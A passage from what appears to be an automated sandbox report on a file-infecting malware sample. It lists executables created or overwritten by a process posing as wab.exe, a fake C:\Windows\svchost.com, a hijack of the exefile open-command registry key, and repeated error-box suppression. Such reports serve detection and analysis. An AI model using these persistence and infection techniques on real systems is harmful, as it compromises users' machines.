              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Windows\svchost.com
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Users\user\AppData\Local\Temp\chrome.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Windows\svchost.com

              Boot Survival

              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULL
              Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
